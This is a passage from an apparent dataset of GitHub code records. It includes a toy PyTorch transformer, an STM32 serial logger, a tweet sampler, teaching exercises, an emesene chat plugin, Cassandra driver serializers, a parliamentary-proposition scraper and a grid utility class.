x.permute(0, 2, 1, 3).contiguous()\n return x.view(batch_size, seq_length, self.d_model)\n\n# Feedforward Layer\nclass FeedForward(nn.Module):\n def __init__(self, d_model, dim_feedforward):\n super(FeedForward, self).__init__()\n self.linear1 = nn.Linear(d_model, dim_feedforward)\n self.linear2 = nn.Linear(dim_feedforward, d_model)\n self.relu = nn.ReLU()\n\n def forward(self, x):\n x = self.relu(self.linear1(x))\n x = self.linear2(x)\n return x\n\n# Transformer Block\nclass TransformerBlock(nn.Module):\n def __init__(self, d_model, n_heads, dim_feedforward):\n super(TransformerBlock, self).__init__()\n self.self_attention = SelfAttention(d_model, n_heads)\n self.feedforward = FeedForward(d_model, dim_feedforward)\n self.norm1 = nn.LayerNorm(d_model)\n self.norm2 = nn.LayerNorm(d_model)\n\n def forward(self, x):\n attention_output = self.self_attention(x)\n x = x + attention_output\n x = self.norm1(x)\n feedforward_output = self.feedforward(x)\n x = x + feedforward_output\n x = self.norm2(x)\n return x\n\n# Transformer Model\nclass Transformer(nn.Module):\n def __init__(self, vocab_size, d_model, n_heads, dim_feedforward, num_layers):\n super(Transformer, self).__init__()\n self.token_embedding = TokenEmbedding(vocab_size, d_model)\n self.positional_encoding = PositionalEncoding(d_model)\n self.transformer_blocks = nn.ModuleList(\n [TransformerBlock(d_model, n_heads, dim_feedforward) for _ in range(num_layers)]\n )\n self.fc = nn.Linear(d_model, vocab_size)\n\n def forward(self, x):\n x = self.token_embedding(x)\n x = self.positional_encoding(x)\n for transformer_block in self.transformer_blocks:\n x = transformer_block(x)\n x = self.fc(x)\n return x\n\n# Trainingsdaten\ntext = \"Das ist ein Beispieltext.\"\ntokens = text.split()\n\n# Vokabular erstellen\nvocab = list(set(tokens))\nvocab_size = len(vocab)\nword2idx = {word: idx for idx, word in enumerate(vocab)}\nidx2word = {idx: word for idx, word in enumerate(vocab)}\n\n# Tokenisierung\ntoken_ids = [word2idx[word] for word in tokens]\n\n# Modell initialisieren\nmodel = Transformer(vocab_size, d_model, n_heads, dim_feedforward, num_layers)\n\n# Loss-Funktion und Optimizer\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.Adam(model.parameters(), lr=learning_rate)\n\n# Trainingsschleife\nfor epoch in range(num_epochs):\n optimizer.zero_grad()\n inputs = torch.tensor(token_ids[:-1], dtype=torch.long)\n targets = torch.tensor(token_ids[1:], dtype=torch.long)\n outputs = model(inputs.unsqueeze(0))\n loss = criterion(outputs.squeeze(0), targets)\n loss.backward()\n optimizer.step()\n print(f\"Epoch: {epoch+1}, Loss: {loss.item()}\")\n\n# Beispielgenerierung\ninput_ids = torch.tensor(token_ids[:-1], dtype=torch.long)\ngenerated_ids = model(input_ids.unsqueeze(0)).argmax(dim=-1)\ngenerated_text = [idx2word[idx.item()] for idx in generated_ids.squeeze()]\nprint(\"Generated Text:\", \" \".join(generated_text))\n","repo_name":"Goku-bot/My-Own-Smarthome-AI","sub_path":"Conversational/train-conv-v1.py","file_name":"train-conv-v1.py","file_ext":"py","file_size_in_byte":5881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26712847314","text":"import serial\nimport serial.tools.list_ports as lst\nimport time\n\nlogFile = open('/home/filippo/Desktop/logFile_1.txt', 'w')\n\ninfo = lst.comports()\n\nser = serial.Serial()\n\ndef find_Stm():\n for port in info:\n if(port.product.find(\"STM32\") != -1):\n return port.device\n return 0\n\ndef open_device(dev):\n ser.port = dev\n ser.baudrate = 2250000\n ser.open()\n ser.readline()\n\n\ndef parse_message(msg):\n msg = msg.decode('utf-8')\n msg = msg.split(\"\\t\")[1:]\n msg = \"\\t\".join(msg)\n return msg\n\n\nif __name__ == \"__main__\":\n if find_Stm() == 0:\n print(\"no STM32 Detected, Exit_Program\")\n exit(0)\n\n open_device(find_Stm())\n\n\n while True:\n try:\n msg = ser.readline()\n msg = parse_message(msg)\n msg = str(time.time()) + \"\\t\" + msg\n logFile.write(msg)\n except KeyboardInterrupt:\n logFile.close()\n exit(0)\n\n \n","repo_name":"mattebit/chimera-sensors","sub_path":"Tools/CAN_logger.py","file_name":"CAN_logger.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33605668171","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 6 18:16:36 2020\n\n@author: yulli\n\"\"\"\nimport src.utils.constants as cns\nfrom src.collect.tweet import Tweet\nfrom src.utils.files import write_list\nfrom src.utils.files import read_sample\nfrom src.utils.effects import progress_bar\nimport random\nimport glob\nimport argparse\n\n\ndef generate(source_dir, target_file, n_items, list_to_ignore):\n random.seed(cns.SEED)\n tweets = glob.glob(source_dir + '*.json')\n sample = []\n progress_bar(0, n_items)\n count_items = 0\n while count_items < n_items and len(tweets) != 0:\n choosed = tweets[random.randint(0, len(tweets)-1)]\n tweet = Tweet(choosed)\n if not tweet.is_retweet() and tweet.id() not in list_to_ignore:\n sample.append(tweet.id())\n count_items += 1\n progress_bar(count_items, n_items)\n\n tweets.remove(choosed)\n write_list(target_file, sample)\n if len(sample) != n_items:\n print(f\"Couldn't generate a sample with {n_items} items. \"\n f\"A sample with {len(sample)} was generated.\")\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"Create datasets.\")\n parser.add_argument('-v', '--valid_sample', action='store_true',\n help=\"Generate real datasets\")\n args = parser.parse_args()\n\n if args.valid_sample:\n print(\"Generate preprocess sample ...\")\n ignore_tweets = read_sample(cns.UNLABLED_SAMPLE)\n generate(cns.PATH_STOPWORDS, cns.PREPROCESS_SAMPLE, 10**5,\n ignore_tweets)\n else:\n s_dir = cns.ROOT_DATA + 'temp/jsons/'\n generate(s_dir, cns.ROOT_DATA + 'temp/sample-test.txt', 10,\n ['1129184408106201088', '1127340537021964288'])\n","repo_name":"yullidias/AutomaticIronyDetection","sub_path":"src/generate_sample.py","file_name":"generate_sample.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20014238910","text":"# Constructor\n\n# Creating class -> Employee()\nclass Employee():\n\n # Creating constructor\n def __init__(self, name, salary, department):\n self.name = name # this is attribute\n self.salary = salary # this is attribute\n self.department = department # this is attribute\n\n def showData(self):\n print(\"name = {} \".format(self.name)) # Another way to do it\n print(\"Salary = {} \".format(self.salary)) # Another way to do it\n print(\"Department = {} \".format(self.department)) # Another way to do it\n\n\n# creating object -> obj1\n\n# First object\nobj1 = Employee(\"John\", 5000, \"IT\" )\nobj1.showData()\nobj1.salary = 7000 # modifying value in class\nobj1.name = \"John Doe\" # new value in parameter of name\nobj1.department = \"Manager\" # new value in parameter of department\n\nobj1.showData()\n\n# Second Object\nobj2 = Employee(\"Sara\", 4000, \"Accounting\" )\nobj2.showData()\nobj2.name = \"Sara Smith\"\nobj2.department = \"Developer\"\nobj2.showData()\n\n# Third Object\nobj3 = Employee(\"Tommy\", 3000, \"Designer\" )\n\n# obj2.showData()\n# obj3.showData()\n\n","repo_name":"soudomsinh/Python","sub_path":"Python-OOP/Constructor&Destructor.py","file_name":"Constructor&Destructor.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74348170724","text":"# -*- coding: utf-8 -*-\n\nimport gtk\nimport gobject\n\nimport Plugin\nimport desktop\nfrom emesenelib.common import escape\nfrom emesenelib.common import unescape\nfrom Parser import PangoDataType\n\nERROR = ''\n\nclass MainClass(Plugin.Plugin):\n '''Main plugin class'''\n \n description = _('Notifies various events through messages in your conversation')\n authors = {'Tito': 'tito@webtito.be'}\n website = 'http://perso.webtito.be'\n displayName = _('Inline notifications')\n name = 'InlineNotify'\n \n def __init__(self, controller, msn):\n '''Contructor'''\n Plugin.Plugin.__init__(self, controller, msn, 1000)\n self.controller = controller\n self.description = _('Notifies various events through messages in your conversation')\n self.authors = {'Tito': 'tito@webtito.be'}\n self.website = 'http://perso.webtito.be'\n self.displayName = _('Inline notifications')\n self.name = 'InlineNotify'\n\n self.enabled = False\n self.config = controller.config\n self.config.readPluginConfig(self.name)\n \n self.signals = {}\n self.signals['nick-changed'] = self.nick\n self.signals['contact-status-change'] = self.status\n self.signals['display-picture-changed'] = self.avatar\n self.signals['personal-message-changed'] = self.personal\n self.ids = []\n \n self.status = {\n 'NLN' : _('online'),\n 'AWY' : _('away'),\n 'BSY' : _('busy'),\n 'BRB' : _('be right back'),\n 'PHN' : _('on the phone'),\n 'LUN' : _('gone to lunch'),\n 'IDL' : _('idle'),\n 'FLN' : _('offline') }\n \n def start(self):\n self.enabled = True\n for (key, value) in self.signals.iteritems():\n self.ids.append(self.msn.connect(key, value))\n \n def stop(self):\n for identifier in self.ids:\n self.msn.disconnect(identifier)\n self.ids = []\n self.enabled = False\n return True\n \n def check(self):\n return (True, 'Ok')\n \n def nick(self, msnp, mail, nick):\n result = self.controller.conversationManager.getOpenConversation(mail)\n if result != None:\n window, conversation = result\n alias = self.controller.contacts.get_display_name(mail)\n if alias != nick: mail = alias\n text = _('%(mail)s is now called %(nick)s') % {'mail': mail, 'nick': nick}\n conversation.appendOutputText(None, text, 'information')\n \n def status(self, msnp, mail, status):\n result = self.controller.conversationManager.getOpenConversation(mail)\n if result != None:\n window, conversation = result\n nick = self.controller.contacts.get_display_name(mail)\n text = _('%(nick)s is now %(status)s') % {'nick' : nick, 'status' : self.status[status]}\n conversation.appendOutputText(None, text, 'information')\n \n def avatar(self, mnsp, p2p, msnobj, mail):\n result = self.controller.conversationManager.getOpenConversation(mail)\n if result != None:\n window, conversation = result\n nick = self.controller.contacts.get_display_name(mail)\n text = _('%s has a new avatar') % nick\n conversation.appendOutputText(None, text, 'information')\n \n def personal(self, msnp, mail, pm):\n result = self.controller.conversationManager.getOpenConversation(mail)\n if result != None:\n window, conversation = result\n nick = self.controller.contacts.get_display_name(mail)\n if pm != '': text = _('%(nick)s has a new personal message : %(message)s') % {'nick' : nick, 'message' : pm}\n else: text = _('%s doesn\\'t have personal message anymore') % nick\n conversation.appendOutputText(None, text, 'information')\n","repo_name":"csuarez/emesene-1.6.3-fixed","sub_path":"plugins_base/InlineNotify.py","file_name":"InlineNotify.py","file_ext":"py","file_size_in_byte":3885,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"72927570086","text":"#EXERCÍCIOS DA AULA 6 \n#Eduardo Maciel Sanchez\n\n#45. Calcule e mostre a série 1 – 2/4 + 3/9 – 4/16 + 5/25 + ... + 15/225\n\n#def Ex45():\ndef calcSerie(divMax):\n resultado = 0\n i,j = 1,1\n for n in range(1,16):\n j = n**2\n print(i,\" / \",j)\n resultado += i/j\n if i < 0:\n i = (-i)+1\n else:\n i = -(i+1)\n return(resultado)\n\nprint(\"Calcula a série 1 – 2/4 + 3/9 – 4/16 + 5/25 + ... + 15/225\")\nserie = calcSerie(225)\nprint(\"A soma é: \",serie)\n \n ","repo_name":"DesolateElf-dev/Algoritmos","sub_path":"Algoritmos/modulo_01/Ex45.py","file_name":"Ex45.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73950384485","text":"import six\n\n\ndef initialize_registry(insights_registry):\n # This will be called from the cluster module, so we put all this behavior\n # in a function to avoid circular imports\n\n if insights_registry.initialized:\n return False\n\n from cassandra import ConsistencyLevel\n from cassandra.cluster import (\n ExecutionProfile, GraphExecutionProfile,\n ProfileManager, ContinuousPagingOptions,\n EXEC_PROFILE_DEFAULT, EXEC_PROFILE_GRAPH_DEFAULT,\n EXEC_PROFILE_GRAPH_ANALYTICS_DEFAULT,\n EXEC_PROFILE_GRAPH_SYSTEM_DEFAULT,\n _NOT_SET\n )\n from cassandra.datastax.graph import GraphOptions\n from cassandra.datastax.insights.registry import insights_registry\n from cassandra.datastax.insights.util import namespace\n from cassandra.policies import (\n RoundRobinPolicy,\n DCAwareRoundRobinPolicy,\n TokenAwarePolicy,\n WhiteListRoundRobinPolicy,\n HostFilterPolicy,\n ConstantReconnectionPolicy,\n ExponentialReconnectionPolicy,\n RetryPolicy,\n SpeculativeExecutionPolicy,\n ConstantSpeculativeExecutionPolicy,\n WrapperPolicy\n )\n\n import logging\n\n log = logging.getLogger(__name__)\n\n @insights_registry.register_serializer_for(RoundRobinPolicy)\n def round_robin_policy_insights_serializer(policy):\n return {'type': policy.__class__.__name__,\n 'namespace': namespace(policy.__class__),\n 'options': {}}\n\n @insights_registry.register_serializer_for(DCAwareRoundRobinPolicy)\n def dc_aware_round_robin_policy_insights_serializer(policy):\n return {'type': policy.__class__.__name__,\n 'namespace': namespace(policy.__class__),\n 'options': {'local_dc': policy.local_dc,\n 'used_hosts_per_remote_dc': policy.used_hosts_per_remote_dc}\n }\n\n @insights_registry.register_serializer_for(TokenAwarePolicy)\n def token_aware_policy_insights_serializer(policy):\n return {'type': policy.__class__.__name__,\n 'namespace': namespace(policy.__class__),\n 'options': {'child_policy': insights_registry.serialize(policy._child_policy,\n policy=True),\n 'shuffle_replicas': policy.shuffle_replicas}\n }\n\n @insights_registry.register_serializer_for(WhiteListRoundRobinPolicy)\n def whitelist_round_robin_policy_insights_serializer(policy):\n return {'type': policy.__class__.__name__,\n 'namespace': namespace(policy.__class__),\n 'options': {'allowed_hosts': policy._allowed_hosts}\n }\n\n @insights_registry.register_serializer_for(HostFilterPolicy)\n def host_filter_policy_insights_serializer(policy):\n return {\n 'type': policy.__class__.__name__,\n 'namespace': namespace(policy.__class__),\n 'options': {'child_policy': insights_registry.serialize(policy._child_policy,\n policy=True),\n 'predicate': policy.predicate.__name__}\n }\n\n @insights_registry.register_serializer_for(ConstantReconnectionPolicy)\n def constant_reconnection_policy_insights_serializer(policy):\n return {'type': policy.__class__.__name__,\n 'namespace': namespace(policy.__class__),\n 'options': {'delay': policy.delay,\n 'max_attempts': policy.max_attempts}\n }\n\n @insights_registry.register_serializer_for(ExponentialReconnectionPolicy)\n def exponential_reconnection_policy_insights_serializer(policy):\n return {'type': policy.__class__.__name__,\n 'namespace': namespace(policy.__class__),\n 'options': {'base_delay': policy.base_delay,\n 'max_delay': policy.max_delay,\n 'max_attempts': policy.max_attempts}\n }\n\n @insights_registry.register_serializer_for(RetryPolicy)\n def retry_policy_insights_serializer(policy):\n return {'type': policy.__class__.__name__,\n 'namespace': namespace(policy.__class__),\n 'options': {}}\n\n @insights_registry.register_serializer_for(SpeculativeExecutionPolicy)\n def speculative_execution_policy_insights_serializer(policy):\n return {'type': policy.__class__.__name__,\n 'namespace': namespace(policy.__class__),\n 'options': {}}\n\n @insights_registry.register_serializer_for(ConstantSpeculativeExecutionPolicy)\n def constant_speculative_execution_policy_insights_serializer(policy):\n return {'type': policy.__class__.__name__,\n 'namespace': namespace(policy.__class__),\n 'options': {'delay': policy.delay,\n 'max_attempts': policy.max_attempts}\n }\n\n @insights_registry.register_serializer_for(WrapperPolicy)\n def wrapper_policy_insights_serializer(policy):\n return {'type': policy.__class__.__name__,\n 'namespace': namespace(policy.__class__),\n 'options': {\n 'child_policy': insights_registry.serialize(policy._child_policy,\n policy=True)\n }}\n\n @insights_registry.register_serializer_for(ExecutionProfile)\n def execution_profile_insights_serializer(profile):\n return {\n 'loadBalancing': insights_registry.serialize(profile.load_balancing_policy,\n policy=True),\n 'retry': insights_registry.serialize(profile.retry_policy,\n policy=True),\n 'readTimeout': profile.request_timeout,\n 'consistency': ConsistencyLevel.value_to_name.get(profile.consistency_level, None),\n 'serialConsistency': ConsistencyLevel.value_to_name.get(profile.serial_consistency_level, None),\n 'continuousPagingOptions': (insights_registry.serialize(profile.continuous_paging_options)\n if (profile.continuous_paging_options is not None and\n profile.continuous_paging_options is not _NOT_SET) else\n None),\n 'speculativeExecution': insights_registry.serialize(profile.speculative_execution_policy),\n 'graphOptions': None\n }\n\n @insights_registry.register_serializer_for(GraphExecutionProfile)\n def graph_execution_profile_insights_serializer(profile):\n rv = insights_registry.serialize(profile, cls=ExecutionProfile)\n rv['graphOptions'] = insights_registry.serialize(profile.graph_options)\n return rv\n\n _EXEC_PROFILE_DEFAULT_KEYS = (EXEC_PROFILE_DEFAULT,\n EXEC_PROFILE_GRAPH_DEFAULT,\n EXEC_PROFILE_GRAPH_SYSTEM_DEFAULT,\n EXEC_PROFILE_GRAPH_ANALYTICS_DEFAULT)\n\n @insights_registry.register_serializer_for(ProfileManager)\n def profile_manager_insights_serializer(manager):\n defaults = {\n # Insights's expected default\n 'default': insights_registry.serialize(manager.profiles[EXEC_PROFILE_DEFAULT]),\n # remaining named defaults for driver's defaults, including duplicated default\n 'EXEC_PROFILE_DEFAULT': insights_registry.serialize(manager.profiles[EXEC_PROFILE_DEFAULT]),\n 'EXEC_PROFILE_GRAPH_DEFAULT': insights_registry.serialize(manager.profiles[EXEC_PROFILE_GRAPH_DEFAULT]),\n 'EXEC_PROFILE_GRAPH_SYSTEM_DEFAULT': insights_registry.serialize(\n manager.profiles[EXEC_PROFILE_GRAPH_SYSTEM_DEFAULT]\n ),\n 'EXEC_PROFILE_GRAPH_ANALYTICS_DEFAULT': insights_registry.serialize(\n manager.profiles[EXEC_PROFILE_GRAPH_ANALYTICS_DEFAULT]\n )\n }\n other = {\n key: insights_registry.serialize(value)\n for key, value in manager.profiles.items()\n if key not in _EXEC_PROFILE_DEFAULT_KEYS\n }\n overlapping_keys = set(defaults) & set(other)\n if overlapping_keys:\n log.debug('The following key names overlap default key sentinel keys '\n 'and these non-default EPs will not be displayed in Insights '\n ': {}'.format(list(overlapping_keys)))\n\n other.update(defaults)\n return other\n\n @insights_registry.register_serializer_for(GraphOptions)\n def graph_options_insights_serializer(options):\n rv = {\n 'source': options.graph_source,\n 'language': options.graph_language,\n 'graphProtocol': options.graph_protocol\n }\n updates = {k: v.decode('utf-8') for k, v in six.iteritems(rv)\n if isinstance(v, six.binary_type)}\n rv.update(updates)\n return rv\n\n @insights_registry.register_serializer_for(ContinuousPagingOptions)\n def continuous_paging_options_insights_serializer(paging_options):\n return {\n 'page_unit': paging_options.page_unit,\n 'max_pages': paging_options.max_pages,\n 'max_pages_per_second': paging_options.max_pages_per_second,\n 'max_queue_size': paging_options.max_queue_size\n }\n\n insights_registry.initialized = True\n return True\n","repo_name":"datastax/python-driver","sub_path":"cassandra/datastax/insights/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":9589,"program_lang":"python","lang":"en","doc_type":"code","stars":1354,"dataset":"github-code","pt":"52"} +{"seq_id":"21136280950","text":"import re\n\nfrom aviva_pensions.parsers.text_parser_interface import TextParserInterface\n\nclass RisksParser(TextParserInterface):\n\n def __init__(self, names:list[str]) -> None:\n super().__init__()\n\n self._risk_names = names\n\n def get_name(self) -> str:\n return 'risks'\n\n def get_values(self, text: str) -> dict:\n\n values = {}\n\n for name in self._risk_names:\n result = re.search(\"{}Yes\".format(name), text)\n if result != None:\n values[name] = 'Yes'\n else:\n values[name] = 'No'\n\n return values\n","repo_name":"timothy-r/pension-fund-report","sub_path":"aviva_pensions/parsers/risks_parser.py","file_name":"risks_parser.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23785640424","text":"import time\r\n\r\nimport environment.graph as graph\r\n\r\nif __name__ == '__main__':\r\n\r\n print('Creating environment data')\r\n start = time.time()\r\n\r\n # Define graph\r\n nodes = 10; weigths = 2; density = 0.5\r\n\r\n # Generate adjacency matrix and the cost matrix from random graph\r\n adj, cost = graph.rand(nodes, weigths, density)\r\n\r\n print(f\"ADJACENCY MATRIX \\n{adj}\"),\r\n\r\n print(f\"COST MATRIX \\n{cost}\")\r\n\r\n finish = time.time() - start\r\n print('Running time {} sec'.format(finish))\r\n\r\n graph.plot(adj)\r\n","repo_name":"ramonlins/kserver","sub_path":"test_generate_graph.py","file_name":"test_generate_graph.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1010494494","text":"import numpy as np\nfrom yutility import ensure_list\nfrom collections.abc import Iterable\n\n\nclass Grid:\n '''\n Class that defines positions and values on a grid.\n '''\n def __init__(self, spacing: Iterable[float] or float = None, \n origin: Iterable[float] or float = None, \n ndims: int = None):\n if ndims is None:\n # check if we can get the number of dimensions from spacing or origin\n if spacing:\n ndims = len(ensure_list(spacing))\n elif origin:\n ndims = len(ensure_list(origin))\n # if not, we default to a 3D grid\n else:\n ndims = 3\n\n self.ndims = ndims\n\n self.spacing = np.array(ensure_list(spacing or [1] * ndims))\n self.origin = np.array(ensure_list(origin or [0] * ndims))\n if len(self.spacing) != ndims:\n self.spacing = np.array([self.spacing[0]] * ndims)\n\n self.sub_grids = []\n\n # arithmetic and logic\n def __add__(self, other):\n return self.__and__(other)\n\n def __and__(self, other):\n if isinstance(other, Grid):\n self.sub_grids.append((other, '+'))\n return self\n\n def __sub__(self, other):\n return self.__or__(other)\n\n def __or__(self, other):\n if isinstance(other, Grid):\n self.sub_grids.append((other, '-'))\n return self\n\n # necessary functions\n def set_points(self, parent=None):\n self._points = None\n self.incorporate_sub_grid()\n\n def incorporate_sub_grid(self):\n for sub_grid, sign in self.sub_grids:\n if self._points is None:\n self._points = sub_grid.points(self)\n continue\n\n if sign == '+':\n unique_indices = np.invert((sub_grid.points(self) == self._points[:,None]).all(2).any(0))\n self._points = np.append(self._points, sub_grid.points(self)[unique_indices], axis=0)\n\n if sign == '-':\n unique_indices = np.invert((self._points == sub_grid.points(self)[:,None]).all(2).any(0))\n self._points = self._points[unique_indices]\n\n duplicate_indices = (sub_grid.points(self) == self._points[:,None]).all(2).any(0)\n self._points = np.append(self._points, sub_grid.points(self)[duplicate_indices], axis=0)\n\n # if self._points is None:\n # self._points = np.array([])\n\n # return self._points\n\n\n def points(self, parent=None):\n if not hasattr(self, '_points'):\n self.set_points(parent=parent)\n return self._points\n\n\nclass Cube(Grid):\n ### grid additive methods\n def __init__(self, origin: Iterable[float] or float = None, \n extent: Iterable[float] or float = None,\n spacing: Iterable[float] or float = None, \n *args, **kwargs):\n '''\n Add points in a cube to the Grid.\n \n Args:\n origin: The origin of the cube to be added.\n extent: The distance the cube goes from the origin. For example, for a 2D box, the extent would be (width, height).\n '''\n super().__init__(spacing, origin, *args, **kwargs)\n self.extent = ensure_list(extent)\n\n def set_points(self, parent=None):\n if parent:\n origin = self.origin - parent.origin\n spacing = parent.spacing\n else:\n origin = self.origin\n spacing = self.spacing\n\n assert len(origin) == self.ndims\n assert len(self.extent) == self.ndims\n\n # first build the axes\n # for a cube, the axes are linearly spaced starting in the origin and ending in origin + extent. \n # The number of points along each axis is given by self.spacing\n axes = []\n for dim in range(self.ndims):\n axis = np.arange(0, self.extent[dim], spacing[dim])\n axis = axis + origin[dim]\n axes.append(axis.round(10))\n\n # after getting all axes we create a meshgrid\n meshed_axes = np.meshgrid(*axes)\n meshed_axes = [axis.flatten() for axis in meshed_axes]\n # flattening and stacking gives our points\n self._points = np.vstack(meshed_axes).T\n # self.incorporate_sub_grid()\n self.values = np.zeros(len(self._points))\n\n\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n main_grid = Grid(1, ndims=2)\n cube = Cube((0, 0), (10, 10))\n cube2 = Cube((-10, -10), (30, 30))\n\n main_grid = main_grid + cube - cube2\n print(main_grid.sub_grids)\n plt.scatter(*main_grid.points().T)\n plt.show()\n","repo_name":"YHordijk/yutility","sub_path":"grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":4666,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"8132140203","text":"import os\n\nclass MemClass():\n \"\"\" Class to get the total memory usage, free memory, buffered and\n cached memory. \"\"\"\n\n #\n # Class constructor\n #\n def __init__(self):\n pass\n\n #\n # String representation\n #\n def __str__(self):\n return ' '.join(self.__mem_current())\n\n #\n # Get memory usage\n #\n def __mem_current(self):\n # Open proc file\n with open('/proc/meminfo') as fd:\n meminfo = fd.read().split()\n fd.close()\n\n # Remove uninteresting items from list\n del meminfo[3 - 1::3]\n mem = []\n\n # Return the two things we're interested in\n for key in range(len(meminfo)):\n if \"MemTotal\" in meminfo[key]:\n mem.append(meminfo[key + 1])\n if \"MemFree\" in meminfo[key]:\n mem.append(meminfo[key + 1])\n\n return mem\n\n #\n # Collector trigger\n #\n def get_stats(self):\n return self.__mem_current()\n \n","repo_name":"krihal/sysinfo","sub_path":"adapters/mem.py","file_name":"mem.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73086071524","text":"from selenium import webdriver\nimport chromedriver_binary \nimport time\nimport datetime\nimport requests \nimport hashlib\nimport logging\n\nlogging.basicConfig(level=logging.INFO)\n\n\noptions = webdriver.ChromeOptions()\noptions.add_argument(\"--headless\")\noptions.add_argument(\"--disable-gpu\")\n\ndef get_timestamp(date):\n timestamp_now = time.mktime(datetime.datetime.strptime(date, \"%d/%m/%Y\").timetuple())\n\n return timestamp_now\n\n\n\ndef get_info_all_propositions(type):\n logging.info(f\"Function get_info_all_propositions. Proposition inserted: {type}\")\n\n driver = webdriver.Chrome(chrome_options=options)\n num_page = 1\n all_timestamp = []\n all_link = []\n all_propositions = []\n\n today = datetime.date.today()\n time_now = get_timestamp(today.strftime(\"%d/%m/%Y\"))\n tree_day_ago = time_now-(72*60*60)\n\n condition = 0\n\n while num_page==num_page:\n url = f'''https://www.camara.leg.br/busca-portal?contextoBusca=BuscaProposicoes&pagina={num_page}&order=data&abaEspecifica=true&filtros=%5B%7B\"ano\"%3A\"2021\"%7D%5D&tipos={type}'''\n driver.get(url)\n\n # get all dates\n all_dates = driver.find_elements_by_xpath(\"//p[@class='busca-resultados__info']\")\n\n # get only dates and verify if 4 days ago or more\n for date in all_dates:\n d = (date.text.split('\\n')[1].split(\" \")[0])\n timestamp = get_timestamp(d)\n if timestamp>=tree_day_ago:\n all_timestamp.append(timestamp)\n else:\n logging.info(\"Date 4 or more days ago of today\")\n condition = 1\n break\n\n # get all proposition\n all_propositions = driver.find_elements_by_xpath(\"//h6//a\")\n\n # get link proposition\n for a in all_propositions:\n link = driver.find_element_by_link_text(a.text)\n all_link.append(link.get_attribute(\"href\"))\n\n if condition == 1: \n break\n num_page+=1\n return [all_timestamp,all_propositions,all_link]\n\ndef get_pdf_proposition(link_proposition):\n logging.info(f\"Function get_pdf_proposition\")\n\n driver = webdriver.Chrome(chrome_options=options)\n h1 = []\n\n for proposition in link_proposition:\n driver.get(f'''{proposition}''')\n\n it_link = driver.find_element_by_link_text(\"Inteiro teor\")\n link = it_link.get_attribute(\"href\")\n download_pdf(link)\n h1.append(pdf_to_hash())\n return h1\n\n\ndef download_pdf(url):\n logging.info(f\"Function download_pdf\")\n\n filename = url.split('filename=')[1] \n r = requests.get(url, stream=True)\n with open('metadata.pdf', 'wb') as fd: \n for chunk in r.iter_content(2000): \n fd.write(chunk)\n return url.split('filename=')[1]\n\ndef pdf_to_hash():\n logging.info(f\"Function pdf_to_hash\")\n\n file = \"metadata.pdf\"\n BLOCK_SIZE = 65536\n\n file_hash = hashlib.md5()\n with open(file, 'rb') as f:\n fb = f.read(BLOCK_SIZE)\n while len(fb) > 0:\n file_hash.update(fb) \n fb = f.read(BLOCK_SIZE)\n return file_hash.hexdigest()\n\n\ndef run(type):\n logging.info(\"Function: Run\")\n datas_type = get_info_all_propositions(type)\n list_hash = get_pdf_proposition(datas_type[2])\n\n return list_hash\n \n \nif __name__ == '__main__':\n # PUT TYPE PROPOSITION -> ['PL','PEC','PLP']\n logging.info(\"START APP\")\n list_hash = run('PL')\n logging.info(f\"LIST: {list_hash}\")\n \n\n\n","repo_name":"douglasnotfunny/scrap_camara","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31600197849","text":"from .host_configuration_metric_group import HostConfigurationMetricGroup\nfrom oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass HostMemoryConfiguration(HostConfigurationMetricGroup):\n \"\"\"\n Memory Configuration metric for the host\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new HostMemoryConfiguration object with values from keyword arguments. The default value of the :py:attr:`~oci.opsi.models.HostMemoryConfiguration.metric_name` attribute\n of this class is ``HOST_MEMORY_CONFIGURATION`` and it should not be changed.\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param metric_name:\n The value to assign to the metric_name property of this HostMemoryConfiguration.\n Allowed values for this property are: \"HOST_PRODUCT\", \"HOST_RESOURCE_ALLOCATION\", \"HOST_MEMORY_CONFIGURATION\", \"HOST_HARDWARE_CONFIGURATION\", \"HOST_CPU_HARDWARE_CONFIGURATION\", \"HOST_NETWORK_CONFIGURATION\", \"HOST_ENTITES\", \"HOST_FILESYSTEM_CONFIGURATION\"\n :type metric_name: str\n\n :param time_collected:\n The value to assign to the time_collected property of this HostMemoryConfiguration.\n :type time_collected: datetime\n\n :param page_size_in_kb:\n The value to assign to the page_size_in_kb property of this HostMemoryConfiguration.\n :type page_size_in_kb: float\n\n :param page_tables_in_kb:\n The value to assign to the page_tables_in_kb property of this HostMemoryConfiguration.\n :type page_tables_in_kb: float\n\n :param 